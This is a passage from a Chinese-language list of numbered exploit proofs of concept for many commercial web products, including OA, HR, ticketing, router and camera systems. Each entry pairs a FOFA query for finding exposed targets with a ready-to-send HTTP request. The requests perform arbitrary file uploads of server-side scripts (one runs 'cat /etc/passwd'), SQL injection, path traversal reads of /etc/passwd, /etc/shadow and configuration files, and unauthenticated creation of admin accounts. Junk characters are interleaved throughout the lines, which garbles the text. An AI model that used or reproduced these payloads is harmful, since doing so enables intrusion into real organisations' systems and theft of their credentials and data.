<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>) b3 B" o; m3 G1 D) N2 R# @ c' U
<tag>3</tag>
& D- e* n. Z' O: C+ C8 C</UploadResume>
2 c& A" `0 P. w+ M9 _, Q/ A# F</soap:Body>
8 {1 m ^) f+ g0 U; n</soap:Envelope>( l; I: l' Q0 q. W# I% e, ^
! T% `9 E Y* A+ c/ M) C( O1 m
' i6 C) m* P2 l# ^) y) F$ |8 ~
http://x.x.x.x/dizxdell.aspx' Z X. X: x5 |8 ]! _ j6 G( N
- b% j: ~' X) ?# A7 j1 P( k
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传* c! u3 p( ~. o. }8 X) w
FOFA: app="和丰山海-数字标牌"9 W% U6 K$ Z9 b, w0 g8 X$ t( D
POST /QH.aspx HTTP/1.1
' z) O/ `# y* mHost: x.x.x.x
" E* R% r5 i6 u2 {! e! YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0! j" o; n5 ^' q9 h$ Z$ h( o. a
Connection: close h9 f: v$ Q0 a0 \$ v/ P0 k
Content-Length: 583
- ^$ t8 p3 j1 S9 w% V4 IContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey. D, m0 s( ]% A$ G8 `0 Y
Accept-Encoding: gzip+ J0 H7 Y7 Y. Y: g5 j s) f+ C- `' x; A" l
2 d4 B- h5 o9 I. N
------WebKitFormBoundaryeegvclmyurlotuey
; D/ e) B: {: h& `Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
8 Z: H$ e! ? v! n) c' BContent-Type: application/octet-stream
( A( i, D+ d9 c4 \) L3 i1 ^0 s3 K6 g$ T) b" w X- H2 A
<% response.write("ujidwqfuuqjalgkvrpqy") %>
; N/ P' y9 p+ g1 d& x3 o: o------WebKitFormBoundaryeegvclmyurlotuey
" x( W7 |; ~, g! P8 WContent-Disposition: form-data; name="action"
" G. ^% ~0 j/ i# B; @; C# T6 ^
1 k8 O7 l* R& ^0 [- A n4 Qupload) G/ Z# d5 p* z0 I( C: ?
------WebKitFormBoundaryeegvclmyurlotuey* G5 O7 [/ g' l2 e. V, z2 r# J/ X
Content-Disposition: form-data; name="responderId"
! j5 y5 `3 y( b& A( e5 Q3 }' U7 g; R
ResourceNewResponder
6 K1 }1 L7 e0 q& Y) S9 v------WebKitFormBoundaryeegvclmyurlotuey" v: [, o% Q; N/ E
Content-Disposition: form-data; name="remotePath"
* G8 B+ P9 i8 K$ f. \* _4 z$ s' Z. ^
# {/ Q, O* `9 g/opt/resources
5 q/ v" M8 l8 o1 k9 c8 e------WebKitFormBoundaryeegvclmyurlotuey--0 S7 K5 I E( z5 N: L" Y
- n! o/ w, _0 }8 B' b+ t b
6 l4 F o9 j6 U! _$ H. q) x7 w3 Qhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx, e4 w; u1 X9 C$ Q! u
" z$ f8 z+ K- R$ o) v6 b, M
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
$ Y3 H) U1 M9 j( v9 s$ GFOFA: icon_hash="-795291075"8 l, @7 L* F9 z3 U8 `% ]2 \
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
4 U; p( Z' n8 i% E5 SHost: x.x.x.x
7 C4 D+ d/ N$ Y9 C1 Y1 @: XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
7 x2 A, `' y3 UConnection: close& ?' Z5 v! o6 H; d0 f' W# w+ V
Content-Length: 293# i; w+ l- ?: g# d5 i
Accept: */*1 M, @' s/ B8 e
Accept-Encoding: gzip, deflate7 u; I2 E# l0 F- I! [" n% g
Accept-Language: zh-CN,zh;q=0.9: _$ I/ ^7 r- s+ d
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
' L5 v: I2 }$ {# _6 R$ ?& p, [, O1 A" Z- Y% \2 M. m% L
------iiqvnofupvhdyrcoqyuujyetjvqgocod
; @: O# C( U) m3 _2 RContent-Disposition: form-data; name="name"
, D0 X. A( ?6 y* t8 W' y5 S
2 V# y4 q/ Y1 T4 f1 n" n1.php9 h6 m+ ]0 C( P$ b( T6 I
------iiqvnofupvhdyrcoqyuujyetjvqgocod9 x R1 b: V7 E$ p
Content-Disposition: form-data; name="upfile"; filename="1.php"% d4 W Z7 [; r; P r, j
Content-Type: image/jpeg
. A0 P2 Z+ z% X+ J* Y8 R* ?( U2 N$ q
rvjhvbhwwuooyiioxega: G# H( \) z1 b
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
: d7 l0 Y3 z/ d% N+ _: S) j7 `7 V3 { a# C& e# f* r9 I
3 ^: @& L7 ~5 g9 r& Q8 H
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
* V2 B; D0 ?$ @* vFOFA: title="智慧综合管理平台登入", \5 }8 B7 h) }) e3 ~3 U" V
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.15 r- Y _4 _ `- a) n5 [* _
Host: x.x.x.x
+ P( c$ O( ] J% k2 C- ~( w, ^4 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
; ` L& d1 S+ a lContent-Length: 288
b5 V; ?9 B' L& V, ?: I# x/ nAccept: application/json, text/javascript, */*; q=0.01
- m3 I( A8 O. N( H% s6 ^/ nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
4 l1 ^7 k4 F' ?7 m' [Connection: close
9 i/ T' x# b ~, uContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl. C" x$ h: A, \
X-Requested-With: XMLHttpRequest
! Y3 b2 z1 v1 Y! ZAccept-Encoding: gzip
6 @& E8 r" {3 [
. q) m6 w* e* {; J------dqdaieopnozbkapjacdbdthlvtlyl) V$ {, u4 } \9 _
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
6 S* ]3 {( f( q& I, H- NContent-Type: image/jpeg' ~* j! y, e9 ?: r: N4 A! O3 G
: _- I2 x: C3 y/ }; m5 Z
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
2 ~4 ]0 b# D p, ?( N------dqdaieopnozbkapjacdbdthlvtlyl--
( v( s( k, n* L @0 x. m9 y; K" p# C4 [* p' m# v5 |
9 W$ a" ^4 a% Y r5 }1 B, `) phttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
1 c7 Y% k' t L8 {$ R* U" t# x! ~4 h. i) d, t* U+ V# }$ {
165. OrangeHRM 3.3.3 SQL 注入
: R/ u2 V6 W8 L: |% d/ i+ RCVE-2024-36428
$ p! n8 [" J1 K1 }/ PFOFA: app="OrangeHRM-产品"
5 ~7 K% {! [; Z! gURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
, W% T* k, p; d4 U; H# h) {& J5 q6 @) C. q
" U1 @( f! ~1 @3 {166. 中成科信票务管理平台SeatMapHandler SQL注入
7 ?: J# F8 l5 }: AFOFA:body="技术支持:北京中成科信科技发展有限公司" G' O; }2 [; l" c; S; `9 |
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1' P. [/ F' J: k* r
Host:
6 o& e" E# \0 O; lPragma: no-cache
/ L, [2 J0 P* }" g* e) k0 w. \Cache-Control: no-cache0 A3 D" C6 b% f* t+ f
Upgrade-Insecure-Requests: 18 V: o1 U0 D; R" q- [. U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36+ m1 {- h. o' j- ^! |6 H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) r4 @8 r/ m) E) ~2 z. r
Accept-Encoding: gzip, deflate
2 t8 R( e/ ^2 CAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
4 x8 A) Z9 W% p9 A7 iCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
& `3 \! h5 G. tConnection: close% n! D* Z! t4 ]; z
Content-Type: application/x-www-form-urlencoded' p/ H& I# y$ a! l& h
Content-Length: 89
; g0 |6 m, Q( @- |& x! ^4 V( p {- ^4 v
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
4 ^& C, @$ O+ F$ q3 f4 S% G7 d5 y% T( i5 x
+ T, c2 f( m" T1 _+ ~+ b167. 精益价值管理系统 DownLoad.aspx任意文件读取/ Y; u% M" Q7 z# R Z
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
, `. R) l3 S9 H2 J% kGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1! C; w9 D0 [5 u$ Y
Host:
: A1 q# }) x. D6 `8 Z! RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( p+ r* k# \7 b8 b3 [ {% A
Content-Type: application/x-www-form-urlencoded
; P8 e. W+ _1 {& Z2 d' c1 KAccept-Encoding: gzip, deflate1 t* c, ?1 N8 j7 B. p
Accept: */*& C3 i: n- z9 B+ t2 d3 o$ M- U5 t
Connection: keep-alive
4 [$ ]+ v2 H* }4 W8 w o9 ?! {! q/ m' v
2 @! L0 p% }5 G0 u; N
168. 宏景EHR OutputCode 任意文件读取+ H( W( w: y2 E5 l
FOFA:app="HJSOFT-HCM"
' `2 e; U, q( l6 \7 y9 `+ N0 E0 ?9 EGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.19 Q1 b+ D3 t+ r( w( X8 h
Host: your-ip
" J _8 C8 g: p5 v1 `1 O: {2 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36* G. M+ F2 }* W* q- m1 l$ |# b
Content-Type: application/x-www-form-urlencoded/ V8 t" @3 G+ [* Y
Connection: close
' g$ h/ B4 {) M4 e
0 D7 t3 X) i* P# s
1 y7 C& l' v) Z- _) e6 W
2 R: @" F, P+ e; [5 j, P7 G2 q169. 宏景EHR downlawbase SQL注入
1 n# v8 R( N% ?1 Y* o- A* cFOFA:app="HJSOFT-HCM": b8 [+ T1 f2 R2 n# R
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1; R/ V8 O5 Y+ N; z( Y
Host: your-ip
' `. w+ M5 O4 B5 z- r, zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, {) Y' V0 j$ L6 U
Accept: */*9 X0 r, p6 c+ c1 @- {
Accept-Encoding: gzip, deflate
. O- S- r6 k2 d6 `4 |3 a. X' j$ D- YConnection: close
" z' D' g/ V4 C/ @0 N; @( n/ }- @/ f
% J) w9 T7 @- K7 A9 D- F) l- o6 L
9 D% H) Q4 S6 o) v" P) Z
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
6 c0 ~/ Z2 i# u+ l" HFOFA:body="/general/sys/hjaxmanage.js"
/ P6 i+ W, p5 M& ]9 \POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1 J2 V9 p# y6 {. w
Host: balalanengliang
9 ~# k; c$ v1 d* }, l/ ^" nUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 `) g+ }4 U- S& K1 |Content-Type: application/x-www-form-urlencoded! T+ F! ]0 d5 j; f7 l8 k
, B1 @2 w- s" G; q, Rfilename=../webapps/ROOT/WEB-INF/web.xml
( W. p' U2 c# x, o$ f
" x" l' L. a8 ^! S- y
6 v, D" J, g u ?5 U171. 通天星CMSV6车载定位监控平台 SQL注入
D& j8 y- W: ~2 h$ wFOFA:body="/808gps/"
) p: l9 { l) ^* }' i- K4 f% kGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1* X! n" N* k# O0 C; b5 v3 o( X
Host: your-ip
4 x ~( m# s4 B% Z9 n; RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
; b N1 F3 |4 I) Q7 BAccept: */*) _- Z1 A+ M, q% Y) e" w1 Z# T; R6 L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! A2 |* j n) K" r# d0 |# d+ E+ qAccept-Encoding: gzip, deflate x2 Z- h) B G* S9 F2 ?- C0 Q
Connection: close
+ P4 P$ W- X$ _$ z$ K# D5 g- ~ b$ y( A6 \8 O
) u, {3 s- V$ O- U
: l/ i* o0 w0 q
172. DT-高清车牌识别摄像机任意文件读取
+ |9 K$ E' g3 [% j( aFOFA:app="DT-高清车牌识别摄像机"; O2 h5 X6 m; j7 a3 K" k
GET /../../../../etc/passwd HTTP/1.1- _& y( n6 U+ h0 n3 ]- f5 [
Host: your-ip
8 V9 @% }, y( x% F$ l! o8 w5 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 A) C0 j- A: g+ `Accept-Encoding: gzip, deflate
) t& S% Z M% K- ?' P: ~; {Accept: */*
+ V2 x) R% N3 \& S. F. d! VConnection: keep-alive
5 q4 W: j/ b; U2 l- c0 @4 s& X) O, t, r$ W) f6 V7 {! F
2 u& B9 d" e# I! K
4 e4 m$ H- A4 c j/ s( e173. Check Point 安全网关任意文件读取( f9 S" J3 L: \. W
CVE-2024-24919
) L# q# o) @0 O6 ?' xFOFA:app="Check_Point-SSL-Network-Extender"1 @, t; S2 F6 X/ q: M) Z# T K
POST /clients/MyCRL HTTP/1.1' U1 G5 Z! d) m/ u4 G/ f8 t
Host: your-ip
! {4 m1 X! C# u0 X. fContent-Type: application/x-www-form-urlencoded
; |; h6 R( ^' p- g4 E" r9 m; q. K* d( v- r9 t. L0 L
aCSHELL/../../../../../../../etc/shadow9 }2 M( `7 l( C& L
& H: h0 V5 ~6 C' d; O2 r+ _: b! R4 D" {4 z0 h X
& B6 Z! Y4 M. X) c" |5 g3 \
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
' A+ O/ y& b! F& R, QFOFA:app="金和网络-金和OA"0 O4 \, ~) [& V3 h) O5 q8 }
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
" r# h0 q; _5 |& ]6 A9 s* GHost: your-ip' X |5 R# W8 | o! W& A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
1 _+ ~/ o3 D. \+ _6 I2 f+ d$ X+ ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* I) }+ Q: o! I" q- j: ]Accept-Encoding: gzip, deflate, br7 ~6 L" F+ r3 z' ]
Accept-Language: zh-CN,zh;q=0.9
" P+ t% x* c W; @) K" SConnection: close
0 |- K5 U Q* U( g1 t$ Y" }1 M5 r9 e2 [* V$ w2 }% q% ^ ?
- L1 ]/ S0 V5 @7 A7 [0 t' Q( z. u5 B3 q" ]4 F# Y, N
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
7 [1 A( ^/ {( hFOFA:app="金和网络-金和OA"
9 h) w0 j' o3 o: t/ mGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1, |. m! Y: L; B+ h) a
Host:
+ G" s& O( Q1 f! ]; g c; l- h( _& v, qUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ n/ I2 B& k6 M% bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, F& p! n, c& Z q: Q6 L$ E J7 k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% N6 Q" m8 |% \3 a1 {
Accept-Encoding: gzip, deflate
- g" h% O7 j0 y( j( E) q8 }2 C+ aConnection: close9 ~" }9 r! k. ] V8 d9 K' Y
Upgrade-Insecure-Requests: 1
& U5 f' v0 V0 @; H3 Y
/ u l. l: R5 ?3 |; C: ?/ f
' Y, D0 x& E1 p9 V4 Q176. 电信网关配置管理系统 rewrite.php 文件上传" u, |. }5 x! d* ]; y. |- Z
FOFA:body="img/login_bg3.png" && body="系统登录"+ A, h* H, x5 R8 O2 n9 Y
POST /manager/teletext/material/rewrite.php HTTP/1.14 W, ]( M" k, t% U9 i
Host: your-ip
" e6 y5 s# |" aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0& s P" W" y. `, \
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
! h( a( p, m" h, ~7 }, i. o& [; zConnection: close6 p3 `, T. E% d) z3 m) d3 F# S
2 u4 i, W) n/ e3 ]/ M------WebKitFormBoundaryOKldnDPT
8 v5 z! }% |. `' j2 K& H/ A# E* eContent-Disposition: form-data; name="tmp_name"; filename="test.php"
* L$ F$ D$ ]6 v( ?) O' tContent-Type: image/png8 H9 L0 a. l+ w0 p
: D- c, D. Q* c& C/ x2 u<?php system("cat /etc/passwd");unlink(__FILE__);?>
' n$ S7 E7 ^) a$ i------WebKitFormBoundaryOKldnDPT
2 }' X9 [* [4 UContent-Disposition: form-data; name="uploadtime"8 h5 X5 v0 z) \) U' o3 h
5 j% _2 w$ O6 t3 G; y% S
+ N. ~9 E4 N# E }+ Y------WebKitFormBoundaryOKldnDPT--3 q0 R) N' H; D; H2 l2 M( t7 j/ ?
5 }) g" u- _. W3 ] z7 ]
2 M ~# J" U6 S7 F; I
4 v2 ~3 z1 z0 T! v; W177. H3C路由器敏感信息泄露
+ n; n) j3 L* o; u/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg) [5 k" T, X( {4 h( r
/userLogin.asp/../actionpolicy_status/../M60.cfg6 H/ p4 |: n8 p) E% h
/userLogin.asp/../actionpolicy_status/../GR8300.cfg- E. e8 o" I0 U/ j9 r2 @
/userLogin.asp/../actionpolicy_status/../GR5200.cfg0 p6 w X5 F' N0 p) E6 Y, a
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
6 ~& }% w9 E- O- Y. v: f/userLogin.asp/../actionpolicy_status/../GR2200.cfg
' y6 f% k" a6 A! f) k) H: r- C/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg% P9 n" B! r, A
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg+ v$ M) F9 B$ |$ M' V( i/ \) q
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg4 W$ Q7 }. k* n. y1 |! ~
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
- @) G) R1 a1 D2 P" _7 V/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/ e, o9 k0 o, p+ U) Q0 k/userLogin.asp/../actionpolicy_status/../ER5100.cfg# V4 C. F( Z% H' a5 z& n5 r
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg4 p; X( r3 p) W) ?6 l6 h
/userLogin.asp/../actionpolicy_status/../ER3260.cfg, e, V* A- ?, p# ?- L7 `) N3 N
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
1 c) _. P& Q/ W/userLogin.asp/../actionpolicy_status/../ER3200.cfg' o5 U/ f7 O2 n2 J, X7 o% q8 {
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
6 P3 q( f- O' f% P; {: x% K/userLogin.asp/../actionpolicy_status/../ER3108G.cfg R8 V/ u; d7 `- X9 E4 E' @
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
- j+ p8 x+ R4 c' V( g/userLogin.asp/../actionpolicy_status/../ER3100.cfg
, g2 `7 w( E0 A& J5 C/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg0 u0 h. u/ v7 e, Y* p
; T# z6 e, w! ~/ O9 l* b
2 G, X" U# T" H
178. H3C校园网自助服务系统-flexfileupload-任意文件上传4 |/ ?! Q3 [, }; K; L0 k
FOFA:header="/selfservice": I" k/ f' ~$ E+ D' s
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1# _- }8 [, ~& k7 ?
Host:; p$ ?9 D) [/ B7 M' ]6 p, R0 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.368 N& _' r) l0 ]& q! e" r A
Content-Length: 252% o3 [& S! O _; B$ `' H4 {
Accept-Encoding: gzip, deflate/ f: B& t: Z5 y# Q6 F) n
Connection: close
1 C0 L9 m* i8 W- K3 v; X1 K+ [2 eContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l. z$ i9 d# {& ?- E! b! i/ m
-----------------aqutkea7vvanpqy3rh2l
% i5 S4 c: f- J2 w2 L2 E! N5 w6 PContent-Disposition: form-data; name="12234.txt"; filename="12234"
+ j6 j3 I* ^' n' h S" o$ B" t: S0 CContent-Type: application/octet-stream
# V9 i, j# X1 K1 C1 q; \0 aContent-Length: 255
* ~ }) A0 I w2 ]' l+ C7 |
/ r1 K7 Y0 `: K3 _' f5 Z12234
$ b) K+ S0 i3 \8 S$ [' x-----------------aqutkea7vvanpqy3rh2l--
$ y* W# V3 U7 \1 u! K1 ]: N, {" ^8 y5 U6 S2 v' ~, N6 p
! S& M9 S9 _2 CGET /imc/primepush/%2e%2e/flex/12234.txt$ [ l9 X+ b& T/ I/ t
" }- `! e( `4 @3 v; f
+ K1 S, e ?0 A4 Q" S5 C. A179. 建文工程管理系统存在任意文件读取# d0 H n* T0 g" t) H
POST /Common/DownLoad2.aspx HTTP/1.1
5 q2 ]5 f; H4 _* h, V( s# M1 IHost: {{Hostname}}8 [4 [& D+ |9 [, W* C4 O' l
Content-Type: application/x-www-form-urlencoded
: p+ Y, g/ c1 E9 r$ q) [User-Agent: Mozilla/5.03 P! g% f3 [6 n% A3 b8 ^4 M& Y
, c3 g( f* z0 p" D" t& q! F4 p) D% lpath=../log4net.config&Name= i0 J* y) H3 K& |$ E+ H
3 t/ H) C8 E5 I
2 C+ P) I# i1 a2 D
180. 帮管客 CRM jiliyu SQL注入
- g4 O: V) w9 |: v f: uFOFA:app="帮管客-CRM"7 \. t* Y- L( W" L
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
4 x/ g6 C1 g! B4 BHost: your-ip
' F! X2 S9 H9 Q4 N( {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ | u A, Z; _$ o. d3 ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% R* A* Y+ X3 M* j. u2 ]Accept-Encoding: gzip, deflate
/ ~& n& L1 B9 @8 p5 M# |Accept-Language: zh-CN,zh;q=0.9
5 a9 c' c% t/ p, HConnection: close
) ?3 l) |" n$ `8 l1 M! M: c/ l5 f0 i( ^9 r
# c3 s7 {3 W4 X; G8 O m4 l' ]
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入( N* D8 k3 ]/ z. F# C4 k; g
FOFA:"PDCA/js/_publicCom.js"
/ [* r! V6 Z8 a1 w" R% bPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.17 ?- ^2 P" F3 u$ o- M
Host: your-ip
. k; {; r! x, ^6 ], `. yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.360 p L; C' K4 q% l+ c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 y0 B. l( J: f, V$ N4 EAccept-Encoding: gzip, deflate, br
0 O+ d1 R% \5 o% yAccept-Language: zh-CN,zh;q=0.9
9 o% M% x: x/ k8 d0 u. O8 i6 K7 JConnection: close4 Z, Q9 I- \# ?9 x, L, z
Content-Type: application/x-www-form-urlencoded
2 e& d; Q$ E. ~0 e* b6 i
8 R+ `4 Q. e- F/ M: n; T; [9 V1 O5 r5 T- b
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
2 L) V# x$ m' b4 z
2 Z- T/ I. r- ]0 }9 x- v4 x4 L/ ^0 s0 t* U; i# D
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
: o! T" i8 {, _& uFOFA:"PDCA/js/_publicCom.js"
. {& K& e/ F) P3 D7 _* DPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1/ K" t# O/ R2 f% ~2 c
Host: your-ip: F. k, j4 Z$ J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.369 a- k, E7 Y: V4 |# P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# j, F8 K" [9 B2 O. |+ h
Accept-Encoding: gzip, deflate, br
) N+ M4 ~) E: _6 a( c# h+ MAccept-Language: zh-CN,zh;q=0.9
o& P, ]2 ~& f+ \, gConnection: close! E6 P$ e u* S( r/ y
Content-Type: application/x-www-form-urlencoded% F9 L4 C) }; f4 g9 Q, B, p
* [& j$ M% k3 Z/ L; J
' Z1 f" B6 N- vusername=test1234&pwd=test1234&savedays=18 u8 e& G w' ? B8 [
# O, W0 {2 n# t( ?2 x
# o0 d, d# `; ?5 w) Q183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
! E3 b4 B/ r5 _1 d( S* VFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
- C/ T, e2 J$ T4 x) m' z3 L% @) [7 PGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
$ p; a3 p6 u' ^+ p+ F$ N. |# FHost: your-ip
& S; r. X- |: z H- N3 @User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.365 h% G1 A& C( W
Accept-Charset: utf-8: `+ b5 k4 r! N
Accept-Encoding: gzip, deflate
) W8 q [- Z+ |$ R( K8 \# HConnection: close
' X0 O+ ~) \5 ^6 q* d! n. M
; d1 Z1 c1 I* q6 h& K" Q9 c# L$ P$ s3 x* ]
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
' v) A' n9 X' ~! v4 O$ z* U* N( ZFOFA:server="SunFull-Webs"
. u$ R4 Q* q9 m# c' {POST /soap/AddUser HTTP/1.1; B3 @9 W, I) T# Q, n
Host: your-ip; N& K5 f) F2 y z2 Z. G
Accept-Encoding: gzip, deflate
3 l& D4 [# k, H8 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
) V3 o& o' ^6 ^9 n3 }& CAccept: application/xml, text/xml, */*; q=0.011 h1 u8 A# r8 J# s
Content-Type: text/xml; charset=utf-8
6 N% w% H4 Y' c9 A1 V9 {$ ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 \- G# a+ ?, Q0 z: j& g- kX-Requested-With: XMLHttpRequest
6 p5 m% m6 q* W9 U. g9 b/ F5 R; l6 T" s
2 t/ Y, [" s- e, w5 C
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
1 e3 x+ d* \# c* p& w% Q( }
4 Q7 f' |- I8 ?7 z5 B7 V5 j* h0 W* o- Q+ v+ d
185. 瑞友天翼应用虚拟化系统SQL注入
& `+ S$ ~9 r7 j; R' G. r# qversion < 7.0.5.1
$ X2 P: Z, u" [, L, H; S. @FOFA:app="REALOR-天翼应用虚拟化系统"
